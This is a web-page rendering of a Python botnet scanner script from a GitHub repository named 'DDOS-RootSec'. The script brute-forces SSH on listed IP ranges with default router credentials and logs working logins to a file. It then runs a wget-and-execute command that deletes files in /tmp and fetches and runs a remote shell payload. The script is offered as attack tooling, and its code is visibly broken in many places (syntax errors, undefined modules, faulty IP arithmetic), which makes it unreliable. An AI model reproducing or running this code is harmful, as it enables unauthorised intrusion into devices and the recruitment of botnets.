Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Scanning/AUTOSCANNER/B1narybs.py
5038 views
1
#!/usr/bin/python

2
import sys, socket, threading, time, paramiko, random

3


4
print "###############################################################################"

5
print "# ___     __________  ____ _______      _____ _______________.___.  ___       #"

6
print "# / _ \_/\ \______   \/_   |\      \    /  _  \\______   \__  |   | / _ \_/\  #"

7
print "# \/ \___/  |    |  _/ |   |/   |   \  /  /_\  \|       _//   |   | \/ \___/  #"

8
print "#           |    |   \ |   /    |    \/    |    \    |   \\____   |           #"

9
print "#           |______  / |___\____|__  /\____|__  /____|_  // ______|           #"

10
print "#                  \/              \/         \/       \/ \/                  #"

11
print "###############################################################################"

12
print "								[~] BOTNET SCANNER [~]							  "

13
print

14


15
StartScan = random.choice(["Start Infecting Routerz."])

16
raw_input=('Press <Enter> to'+StartScan)

17


18
#ENTER YOUR SERVER IP

19
serverip = "0.0.0.0"

20


21
#ENTER YOUR COMMAND/WGET LINE

22
cmd = "cd /tmp; rm -rf *; wget -q http://0.0.0.0/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -f *"

23


24
#ENTER YOUR BOTNAMES HERE

25
botnames = [

26
    "gtop.sh",

27
    "jackmyarmv6",

28
    "jackmyi586",

29
    "jackmyi686",

30
    "jackmymips",

31
    "jackmymipsel",

32
    "jackmypowerpc",

33
    "jackmysh4",

34
    "jackmyx86"

35
]

36


37
#USERNAME LIST

38
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']

39


40
#PASSWORD LIST

41
passlist = [ 'root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']

42


43
#DEFAULT RANGES

44
ipranges = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",]

45


46
if sys.argv[3] == 'best':

47
	passwords = [userlist+ ":" +passlist]

48
if sys.argv[3] == '1':

49
	passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective

50
if sys.argv[3] == '2':

51
	passwords = [ "root:root", "admin:admin", "ubnt:ubnt" ] #faster with decent execution

52
if sys.argv[3] == 'perl':

53
	passwords = [ "pi:raspberry", "vagrant:vagrant" ] #perl scanner

54
if sys.argv[3] == 'ubnt':

55
	passwords = [ "ubnt:ubnt" ]

56


57
def IPRange(start_ip, end_ip):

58
	start = list(map(int, start_ip.split(".")))

59
	end = list(map(int, end_ip.split(".")))

60
	temp = start

61
	ip_range = []

62
	

63
	ip_range.append(start_ip)

64
	while temp != end:

65
		start[3] += 1

66
		for i in (3, 2, 1):

67
			if temp[i] == 256:

68
			temp[i] = 0

69
			temp[i-1] += 101

70
		ip_range.append(".".join(map(str, temp)))

71
		

72
	return ip_range

73
	

74
class sshscanner(threading.Thread):

75
	def SelfIP (self, ip):

76
		threading.Thread.SelfIP(self)

77
		self.ip = str(ip)

78
	global passwords

79
	def run(self):

80
		x = 1

81
		while x != 0:

82
			try:

83
				username=(userlist)

84
				password=(passlist)

85
				port = 22

86
				s.close

87
				s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

88
				s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

89
				s.settimeout(3)

90
				s.connect((self.ip, port))

91
				s.close()

92
				ssh = paramiko.SSHClient()

93
				ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

94
				dobreak=False

95
				for passwd in passwords

96
					if ":n/a"

97
						password=""

98
					else:

99
						password=passwd.split(":")[1]

100
					if "n/a" in passwd:

101
						username=""

102
					else:

103
						username=passwd.split(":")[0]

104
					try:

105
						ssh.connect(self.ip, port = port, username=username, password=password, timeout=3)

106
						dobreak=True

107
						break

108
					except:

109
						pass

110
					if True == dobreak:

111
				badserver = True

112
				stdin, stdout, stderr = ssh.exec_command("echo blackjesus")

113
				output = stdout.read()

114
					if "blackjesus" in output:

115
						badserver=False

116
					if badserver == False:

117
						os.system("echo -e " +username+ ":" +password+ ":" +self.ip " >> vuln.txt")

118
						print "\033[32mINFECTING:" +username+ ":" +password+ ":" +self.ip+ "\033[0m"

119
						ssh.exec_command(cmd)

120
						time.sleep(3)

121
						ssh.close()

122
					if badserver == True

123
						ssh.close()

124
					except:

125
						pass

126
					 x = 0

127
IP_Range = IPRange("" +sys.argv[1], "" +sys.argv[2])

128
for IP in IP_Range

129
	try:

130
		t = sshscanner(IP)

131
		t.start()

132
	except:

133
		pass

134